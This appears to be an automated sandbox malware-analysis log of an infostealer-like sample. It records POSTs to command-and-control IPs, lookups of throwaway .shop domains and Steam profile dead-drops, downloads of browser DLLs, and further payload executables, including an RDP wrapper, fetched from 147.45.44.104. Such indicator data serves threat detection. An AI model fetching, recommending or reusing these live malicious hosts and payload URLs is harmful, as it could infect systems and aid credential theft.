Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 114889Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6873Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3217Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_00404880

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: wallkedsleeoi.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop

Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe0
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exeY
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220609http://147.45.44.104/prog/66f5db9e
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe7
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll0
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll4
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlL
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000135D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000135D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll8
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllj
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php32
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php:
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpA
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpHTe
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpe
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpop
Source: RegAsm.exe, 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----CGHCGIIDGDAKFIEBKFCFaultrelease
Source: RegAsm.exe, 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109UVWXYZ1234567890undary=----CGHCGIIDGDAKFIEBKFCFaultrelease
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109UXsYur#
Source: file.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgX
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
